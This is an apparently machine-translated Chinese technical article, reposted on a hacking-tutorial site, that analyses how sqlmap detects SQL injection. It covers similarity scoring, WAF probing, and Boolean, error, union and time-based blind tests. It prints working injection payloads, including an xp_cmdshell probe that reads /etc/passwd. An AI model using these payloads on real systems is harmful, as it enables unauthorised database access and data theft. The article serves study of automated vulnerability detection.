Hacking Book | Free Online Hacking Learning

 Home

analysis of sql map detection

Posted by harmelink at 2020-03-02
all

Author: Phoenix @ Anheng scanner

Preface

The sqlmap analyzed in this paper is the version with commit No. 591a60bbde434aacc0d90548cd442d6a756ff104. The version in July 2017 is a little older than now. However, the core logic of SQL map detection has not changed basically. It is still analyzed and summarized with this source code.

This paper analyzes the vulnerability detection process of SQL map from five aspects, including five processes: pre contract (a series of probe requests), Boolean blind injection, error injection, union injection and time blind injection. In this paper, two basic detection algorithms (response similarity comparison technology, Gauss distribution recognition response mechanism) are analyzed in detail, which is also the biggest highlight of this paper. Response similarity comparison technology is widely used in SQL map, and Gauss distribution recognition response mechanism is used in the process of union injection (select null column number detection technology) and time blind injection.

This article contains a large number of flow charts, which can only be explained in the key links I think. This may not be friendly to people who are not familiar with SQL injection vulnerability automation. However, if you look at the flow chart carefully and think more about Google, I believe you will understand it.

Pre contract of SQL map detection

In the process of SQL map detecting SQL injection point, there will be a series of pre contracts, which mainly include

And so on. Strictly speaking, false positives detection is not a pre contract process. False positives detection is used in the process of time blind injection and Boolean blind injection, and has the same logic characteristics. The detection process is described here together. The specific contract situation is described in time blind injection and Boolean blind injection respectively.

In SQL map, response similarity comparison technology is built in the contract engine, which shows the importance of response similarity comparison technology in SQL map, and some of the logic of these pre contract can not do without response similarity comparison. In the industry, there is usually a term of Web similarity comparison. In this paper, web similarity comparison refers to the results of HTTP response body comparison and analysis in response similarity comparison. Therefore, before analyzing the pre contract, first look at the response similarity comparison technology in SQL map.

Response similarity comparison technology

In the whole process of sqlmap detection, there will be a definition of the original response, which means that in the process of website connectivity detection, if the website responds successfully, the response is defined as the original response (including status code, HTTP response header, HTTP response body).

In sqlmap, the original response is the object to be compared in the comparison process. After a request responds successfully, it is compared with the original response to get the comparison results. The specific comparison process is shown in the following figure.

The input of this comparison algorithm is the current entire response (including status, HTTP response header and HTTP response body). The output can be selected according to the needs (including the ratio of web page similarity or Boolean value true / false). If the algorithm output is true, it means that the current response is similar to the original response. If the algorithm output is false, it means that the current response is not similar to the original response. The relationship between the similarity value (ratio) and the similarity Boolean value (true / false) of the two responders is shown in the figure below.

Where ratio is a value between 0-1. In sqlmap, when ratio is less than 0.02 (lower boundary), similarity Boolean value is false; when ratio is greater than 0.98 (upper boundary), similarity Boolean value is true; when ratio is between 0.02-0.98, when ratio is greater than kb.matchratio (knowledge base matchratio value)+ When tolerance is 0.05 by default, the similarity Boolean value is true. Otherwise, the similarity Boolean value is false. In this case, the key problem is to determine the critical point.

The determination of critical point can be divided into two cases

The determination of the critical point of Boolean blind annotation is explained in the following Boolean blind annotation process, and the second case is explained here. In the second case, two conditions need to be met simultaneously to generate the critical point value, respectively:

Then the ratio value will be taken as the critical value and will be used all the time. The term "webpage similarity" will appear later in this paper, which refers to HTTP body comparison technology in response similarity analysis technology.

Response similarity comparison technology as a basic technology exists in sqlmap, which will be widely used in the whole detection process. Before introducing the pre contract, first briefly introduce the injection environment, and then explain it with specific contract, hoping to understand better.

Injection scenario

Suppose that example.php has an injection point, accompanied by some random strings:

$query = "SELECT * FROM users WHERE id=" . $_GET['id'] . " LIMIT 0, 1"; print "<br>static line<br>"; print str_rand(rand(10,20));

Each response will return a random string of any value between 10-20. The request corresponding to the injection point is:

http://target_host/example.php?id=1

Suppose there are two records in MySQL database, namely:

+----+------------------------------------+-------------------+ | id | name | surname | +----+------------------------------------+-------------------+ | 1 | luther | blisset | | 2 | fluffy | bunny | +----+------------------------------------+-------------------+

When the response logic of example.php is that the ID value is x, it will respond to the X database information, and at the same time, the PHP error echo will be turned on.

At this point, the injection environment is built.

Website connectivity detection

The purpose of the contract is to detect the connectivity of the website, and the flow chart is as follows:

The response of website connectivity detection will be used as the original response (used in response similarity comparison technology) and website template (used in website stability detection).

In the specific scenario, the contract awarding situation is as follows:

WAF detection

The purpose of the contract awarding is to detect whether the website is protected by WAF, and the flow chart is as follows:

Based on the original request parameter, a new parameter is added to the payload structure of WAF probe, and the parameter value is set to be with

AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert(\"XSS\")</script>',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')#

Load, usually can trigger WAF. When sqlmap detects that the similarity with the original request response is less than 0.5, it is considered that there is WAF.

In the specific scenario (without WAF), the contracting situation is as follows:

Web page stability detection

The purpose of the contract awarding is to check whether the web page is stable, and the flow chart is as follows:

In the process of checking the stability of the website, if the same request shows different responses, then the dynamic content will be identified automatically, and in the subsequent response similarity comparison process, the dynamic content will be removed before similarity comparison.

Web page stability detection will carry out cyclic dynamic monitoring, and the next step will not be carried out until all dynamic contents are identified stably. When SQL map identifies the dynamic factors of web pages, the dynamic factors of web pages are not stored incrementally. Every time a page is re requested, the dynamic factors will be recalculated, and the previous dynamic factors will be discarded.

In the specific scenario, the contract awarding situation is as follows:

In the above environment, the web page stability detection process will contract twice, the first time to identify dynamic content, and the second time to test whether the dynamic content identification is effective. For dynamic response, web page stability detection can only be processed on the basis of accurate identification of dynamic content.

Parameter dynamic detection

The purpose of the contract awarding is to check whether the parameters are dynamic. The flow chart is as follows:

Sqlmap uses two four digit random numbers for testing. In some cases, if the parameters are not dynamic, you can skip the detection. This function is very effective in batch testing.

Repeat contract issue

In the process of parameter dynamic test in SQL map, the random number is generated twice and the contract is issued, which can be understood as repeated contract. In response to this question, the author was puzzled, so I went to GitHub to ask the author a question. The author's answer is here: https://github.com/sqlmapproject/sqlmap/issues/3304.

In SQL map, there are many cases in which the same logic repeats the contract, including but not limited to the true and false logic in false alarm detection, whether the injection point can be injected in multiple lines at the end of union injection. The author thinks that the possible reason is to send more packets to avoid false positives, or to get more information about the environment (Union injection and multi line injection).

In the specific scenario, the contract situation of parameter dynamic detection is as follows:

Heuristic injection detection

This contract attempts to make the web application report an error. The purpose is to detect whether the parameter point is dynamic or possible injection point. The flow chart is as follows:

In the heuristic injection process, the payload generation is a string of 10 characters randomly composed of '"(). Six characters, and both' and 'are satisfied. The purpose of heuristic injection is to make the web application report errors. If the web application turns on error echo, it can quickly identify DBMS (regular matching).

,'"().

In the figure above is the core logic of heuristic injection detection. In addition, there are contracts for type conversion, XSS simple test, etc. However, the author thinks that these are not core logic, and they are too complex to be drawn in the figure.

In the specific scenario, the contract awarding situation is as follows:

False alarm detection

In Boolean blind injection, response similarity analysis is used to determine whether there is an injection point, while in time blind injection, Gauss algorithm is used to determine whether there is an injection point. These two methods may have false positives. In order to prevent false positives, sqlmap introduces a false positives detection mechanism. The following figure is the flow chart of false alarm detection:

In the actual process of false positive detection, three numbers are used to form different logic, which makes the payload control the response actively and judge whether the injection exists or not according to the response. In the process of using the specific logic in the above figure to construct the payload package, it involves the < vector > tag in the test vector in sqlmap, which will be analyzed in detail in the following Boolean blind annotation and time blind annotation processes.

<vector>

The actual contract of false positive detection will also be displayed and analyzed in the process of Boolean blind injection and time blind injection.

Boolean blind annotation in SQL map detection

Main process of Boolean blind injection

The above figure shows the Boolean blind injection flow chart. Above the dotted line is the pre contracting process, and below the dotted line is the circular contracting process for each injection point.

In the pre contract process of Boolean blind annotation, we can see the target stability detection process. In this process, SQL map will find out the dynamic factors of web pages and use them in the subsequent response similarity analysis process.

In the process of Boolean blind injection, response similarity analysis technology is widely used. As can be seen from the flow chart, the first step of SQL map is to set the critical point blank when it circulates for each injection point. The critical point in Boolean blind annotation is determined in the process of sending two groups of true and false logical packets (logical false packets are sent first, logical true packets are sent later). If the ration value of a certain packet after calculation is between 0.02-0.98, then the ration value is taken as the critical point.

After the conventional response similarity analysis, sqlmap also includes the removal of HTML tags for injection judgment. The author believes that it is aimed at the situation that the amount of HTML tags in response data is large, while the amount of database change data is small. In this process, response similarity analysis is no longer used, but set method (difference set) is used to identify whether the injection exists.

The false alarm detection logic has been described in the pre contract part, and the subsequent analysis will be conducted for the contract in the vulnerability environment.

Analysis of Boolean blind annotation cases

In the above vulnerability scenario, the Boolean blind injection case is analyzed.

First look at the original request:

example.php?id=1

Test vectors that can be successfully injected:

<test> <title>AND boolean-based blind - WHERE or HAVING clause</title> ... <vector>AND [INFERENCE]</vector> <request> <payload>AND [RANDNUM]=[RANDNUM]</payload> </request> <response> <comparison>AND [RANDNUM]=[RANDNUM1]</comparison> </response> </test>

According to the test vector, [randnum] = [randnum1] randomly generates two numbers. The generated logical false data packet is as follows:

[RANDNUM]=[RANDNUM1] example.php?id=1 AND 8858=3197

After sending the first logical fake package, sqlmap begins to calculate the similarity of web pages. First, after removing the dynamic random string, the similarity value between the logical fake page and the original page is 0.787, and the page is not similar to the original page. The web page similarity value will be set as the critical point in the process of this set of test vectors. The default tolerance of sqlmap is 0.05, that is to say, when the web page similarity of a response is greater than 0.792 (0.787 + 0.05), sqlmap thinks that the response is similar to the original page, otherwise, it is not similar to the original page.

According to the test vector, randomly generate a number from [randnum] = [randnum]. The generated logical true data packet is as follows:

[RANDNUM]=[RANDNUM] example.php?id=1 AND 1293=1293

After sending the logical true request, sqlmap receives the response and calculates the page similarity. Here, the calculated page similarity is 1 (the random string is removed), which is greater than 0.792. The logical true response is similar to the original response.

Randomly generate two numbers from [randnum] = [randnum1], and the logical false data package for confirmation is as follows:

[RANDNUM]=[RANDNUM1] example.php?id=1 AND 2560=4847

After removing the random string, the similarity of the web page is calculated, which is 0.787. It is considered that the web page is not similar to the original web page. At this point, sqlmap believes that the injection exists, and then enters the false positive detection phase.

In Boolean blind injection false positive detection, three different numbers will be generated, and these numbers constitute different logic. These logic will replace the original logic in the test vector, and observe whether the response is as expected. Review the test vector, which contains a < vector > tag, where the [reference] in the tag is the logical replacement of three numbers.

<vector> [INFERENCE]

Look at the flow chart of false positives detection. There are five false positives detection logics, which are respectively:

example.php?id=1 AND 25=25

The similarity value of web page is 1, which is similar to the original page. Second logic:

example.php?id=1 AND 25=83

The similarity value of web page is 0.787, which is different from the original page. The third logic:

example.php?id=1 AND 83=53

The similarity value of web page is 0.787, which is different from the original page. The fourth logic:

example.php?id=1 AND 53=53

The similarity value of web page is 1, which is similar to the original page. The fifth logic:

example.php?id=1 AND 83 53

The similarity value of web page is 0.603, which is different from the original page. At this point, the false alarm detection is completed and the injection is confirmed to exist.

Error injection of SQL map detection

Main process of error injection

The figure above shows the flow chart of error injection. Above the dotted line is the process of pre contracting, below the dotted line is the process of circular contracting for each injection point.

SQL map error injection is not simply to let the database server report errors and echo them. SQL map is to control the SQL errors reported by the database. The essence of error injection is payload, and the response of each payload packet is matched by exact regularity. If the error injection can match successfully, there is a logic in the payload that contains the absolute occurrence and execution of SQL, and the case analysis will be analyzed in detail.

Because there is regular matching in the recognition method of error injection, it can be understood that the response that can be matched usually does not have false positives, so it does not need false positives detection.

Case study of error injection

In the above vulnerability scenario, the error injection case is analyzed.

First look at the original request:

example.php?id=1

Test vectors that can be successfully injected:

<test> <title>MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)</title> ... <request> <payload>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</payload> </request> <response> <grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep> </response> <details> <dbms>MySQL</dbms> <dbms_version> >= 5.0</dbms_version> </details> </test>

According to the test vector, replace [randnum], [delimiter [start], [delimiter [stop] as needed. The generated logical false data package is as follows:

[RANDNUM], [DELIMITER_START], [DELIMITER_STOP] example.php?id=1 AND (SELECT 4229 FROM(SELECT COUNT(*),CONCAT(0x7176707871,(SELECT (ELT(4229=4229,1))),0x7176627671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

According to the data package, it can be seen that the [randnum] value is 4229, the median value of [delimiter [start] in payload is 0x7176707871, the echo time value is qvpxq, the median value of [delimiter [stop] in payload is 0x7176627671, and the echo time value is qvbvq.

[RANDNUM] 4229 [DELIMITER_START] 0x7176707871 qvpxq [DELIMITER_STOP] 0x7176627671 qvbvq

The error injection of sqlmap is to control the SQL statement output of injection

<b>SQL error:</b> Duplicate entry 'qvpxq1qvbvq1' for key 'group_key'<br>

For such a mistake, the regular expression ([delimiter [start] (? P < result >. *?) [delimiter [stop]) in the test vector can exactly extract the intermediate value 1. At this point, error injection exists.

[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]

Union injection of sqlmap detection

Main process of union injection

The above figure shows the flow chart of union injection. Above the dotted line is the process of pre contracting, below the dotted line is the process of circular contracting for each injection point.

Union injection is the most complex of the four injection detection methods, which also includes

There are three kinds of technologies, which also contain complex processes and algorithms. There is no stability detection in the pre contract process of pure union injection, which means that the page similarity comparison will not be de duplicated in the process of pure union injection.

The process of union injection can be divided into two steps. The first step is to determine the number of columns, which is mainly based on the order by column number detection technology, supplemented by the select null column number detection technology to form the column number determination technology. The second step is to find a field which is a string field on the basis of determining the number of columns, so as to ensure that the database information can be injected from the field.

Because there is regular matching in the identification method of union injection, it can be understood that the response that can be matched usually does not produce false positives, so it does not need false positives detection.

Order by column number detection technology

Order by column number detection technology relies on Web similarity comparison technology and binary difference algorithm. If order by 1, the response page is similar to the original page, order by 1000 (random four digits), and the response page is not similar to the original page, then the order by technology can be used to determine the number of columns.

Select null column number detection technology

Select null column number detection technology relies on Web similarity comparison technology and Gaussian distribution (normal distribution). The following instructions can be interpreted together with case analysis.

When the select null column number detection technology is in progress, it will first specify the maximum and minimum values during the column number guessing process (specify the minimum / minimum value of column number to be 1, maximum / maximum value It is 10). Sqlmap will send 10 data packets at the same time, including 1 null to 10 null. After the response of 10 packets is retrieved, the page similarity analysis will be carried out and the page similarity value (10 in total, not true / false) will be obtained. Among these 10 values, if the number of select null columns is successfully detected, the page similarity value of the successful response can only be the maximum or minimum value. After removing the maximum value and the minimum value from the 10 values, 8 values are left. It can be considered that these 8 values are the response of unsuccessful column number guessing. Gaussian distribution modeling is carried out for the 8 data, and the resulting model is the unsuccessful column number guessing model. Now use the maximum or minimum value to calculate whether it conforms to the unsuccessful model. If it conforms, it means that the data is also the response to the unsuccessful column number guess. If it does not conform, it means that the data is also the response to the successful column number guess.

Gaussian distribution is one of the anomaly detection algorithms. The following are some key points for understanding the algorithm:

The response of the website is based on logic. If the processing logic of a group of requests is the same, the response is almost the same. If a response changes, we think that the website processing logic has changed, and this logic change may be injection success, because only one request in a group of requests may succeed, then this point can be considered as an exception point.

In union injection, only web page similarity is used as the modeling (Gaussian distribution) index, so the outliers can only be at the maximum or minimum value. After removing the two possible values, the data is a logical data (i.e. injection is not successful), and Gaussian modeling is performed with the unsuccessful data (this is also why select Null technology guesses the reason why the number of columns needs to have the minimum span. There is too little data to model. The more data, the more accurate the model is). The model that comes out is the model that is not injected successfully. That is to say, the 99.99% probability of the data obeying the model is not successful, and the failure to obey the distribution (abnormal point) is the injection success.

Union injection is a kind of injection attack in echo form. Responding to text content is the most obvious way to judge whether union injection is the most obvious way. Because there are many noise content like uncontrollable advertisement, it is convenient and reasonable for machine to use similarity to judge page content. For example, time injection, using response time as a distribution would be more reasonable.

Seven standard deviations divide a group of data into two here, which means that the two groups of data are generated in different mechanisms. In this case, the website processing logic is different. One is to execute SQL statements successfully, the other is not to execute SQL statements successfully.

Select null string location determination technology

Select null string position determination technology relies on regular matching technology, which is a union injection process without false positive detection. In the process of selecting the location of null string, if the location of null string cannot be found successfully, sqlmap will automatically specify a number to replace the null string in payload, and the combination mode of payload will change (payload splicing changes to The parameter value is changed to a negative number, and then the payload is spliced to ensure that the specified number can be echoed in the response.

Case study of union injection

In the above vulnerability scenario, the union injection case is analyzed.

First look at the original request:

example.php?id=1

Test vectors that can be successfully injected:

<test> <title>Generic UNION query (NULL) - 1 to 10 columns</title> ... <request> <payload/> <comment>[GENERIC_SQL_COMMENT]</comment> <char>NULL</char> <columns>1-10</columns> </request> <response> <union/> </response> </test> example.php?id=1 UNION ALL SELECT NULL-- fVTK

The page similarity value of this packet is 0.714, and the second packet:

example.php?id=1 UNION ALL SELECT NULL,NULL-- jmEt

The web page similarity value of this packet is 0.726, and the third packet:

example.php?id=1 UNION ALL SELECT NULL,NULL,NULL-- cRud

The page similarity value of this packet is 0.834, and the fourth packet:

example.php?id=1 UNION ALL SELECT NULL,NULL,NULL,NULL-- AqEV

The web page similarity value of this packet is 0.716, and the fifth packet:

example.php?id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- NvIh

The page similarity value of this packet is 0.71, and the sixth packet:

example.php?id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- qrAS

The page similarity value of this packet is 0.723, and the seventh packet:

example.php?id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- mmxs

The page similarity value of this packet is 0.724, and the eighth packet:

example.php?id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- moNa

The page similarity value of this packet is 0.723, and the ninth packet:

example.php?id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- vHbn

The page similarity value of this packet is 0.725, and the tenth packet:

example.php?id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- bVyF

The similarity value of this packet is 0.722.

Ten web page similarity values are obtained, the maximum value is 0.834 and the minimum value is 0.71. After removing the maximum value and the minimum value, the standard deviation of the remaining eight data is 0.00430738568375 and the average value is 0.721625.

This means that if the similarity value of the web page is greater than the upper boundary or less than the lower boundary, it means the number of columns found successfully. The number of null corresponding to 0.834 is the number of columns, which is 3. So far, the number of columns has been successfully detected.

Next, select null technology is used to determine the string position. Randomly find a position in the three columns, insert string splicing syntax, and observe whether the response can correctly echo a specific string. The data package is as follows:

example.php?id=1 UNION ALL SELECT NULL,CONCAT(0x71707a7a71,0x625448774650554f4d435a696567784762446b776b5a53646c567a475259776c586a53694e675267,0x7178767671),NULL-- VdhL

It can be observed that echo succeeded. At this point, the string position has been determined and the union injection exists.

Time blind annotation of SQL map detection

Main process of time blind injection

The above figure is the flow chart of blind injection of time. The dotted line above represents the pre contracting process, and the dotted line below represents the process of circular contracting for each injection point.

Response delay judgment technology is widely used in the process of time blind injection. As can be seen from the flow chart, response delay judgment technology is used three times for each injection point.

The false alarm detection logic has been described in the pre contract part, and the subsequent analysis will be conducted for the contract in the vulnerability environment.

Response delay judgment Technology

Gauss distribution (normal distribution, see select null column number detection technology for details) is used in response delay judgment technology. In the test vector library of SQL map time blind annotation, there are two kinds of payloads, including accurate delay time, such as [sleeptime] variable and [delay] for a large number of calculations. Gaussian distribution can identify whether a response is generated from a mechanism or not, so [sleep time] and [delay] can be discussed in one case, because salmap distinguishes the response mechanism.

[SLEEPTIME] [DELAY] [SLEEPTIME] [DELAY]

Case analysis of time blind injection

In the above vulnerability scenario, time blind injection case analysis is carried out.

First look at the original request:

example.php?id=1

Test vectors that can be successfully injected:

<test> <title>MySQL >= 5.0.12 AND time-based blind</title> ... <vector>AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector> <request> <payload>AND SLEEP([SLEEPTIME])</payload> </request> <response> <time>[SLEEPTIME]</time> </response> <details> <dbms>MySQL</dbms> <dbms_version> >= 5.0.12</dbms_version> </details> </test>

Before entering the formal test, because the response delay judgment technology needs a large number of normal responses as Gaussian distribution modeling data, SQL map will send 30 original requests as the data source.

According to the test vector, [sleeptime] is randomly generated into a number, and the generated data package is as follows:

[SLEEPTIME] example.php?id=1 AND SLEEP(5)

The response was delayed after the request was sent. At this time, sqlmap sets the [sleeptime] value to 0, and the generated data package is as follows:

[SLEEPTIME] example.php?id=1 AND SLEEP(0)

After the request was sent, there was no delay in the response. Sqlmap sets the value of [sleeptime] to the value of the first contract. The generated logical true packets are as follows:

[SLEEPTIME] example.php?id=1 AND SLEEP(5)

The response was delayed after the request was sent. At this point, sqlmap believes that the injection exists, and then enters the false positive detection phase.

In time blind injection false alarm detection, three different numbers will be generated, and these numbers constitute different logic. Replace these logic with the original logic in the test vector, and observe whether the response is as expected. Review the test vector, which contains a < vector > tag. The [reference] in the tag is the place where the three numbers are logically replaced.

<vector> [INFERENCE]

Look at the flow chart of false positives detection. There are five false positives detection logics, which are respectively:

example.php?id=1 AND 9187=IF((19=19),SLEEP(5),9187)

The response was delayed. Second logic:

example.php?id=1 AND 7052=IF((19=55),SLEEP(5),7052)

There was no delay in the response. The third logic:

example.php?id=1 AND 1148=IF((19=58),SLEEP(5),1148)

There was no delay in the response. The fourth logic:

example.php?id=1 AND 6574=IF((55=55),SLEEP(5),6574)

The response was delayed. The fifth logic:

example.php?id=1 AND 4482=IF((58 55),SLEEP(5),4482)

There was no delay in the response. At this point, the false alarm detection is completed and the injection is confirmed to exist.

summary

Thank you very much. It is not easy to see the summary and to study the technology in depth. It is hoped that this article will be enlightening to those who want to read the source code of sqlmap and those who focus on the automatic detection of SQL injection.

This article was published by seebug paper. If you need to reprint it, please indicate the source. Address: https://paper.seebug.org/729/

© 2023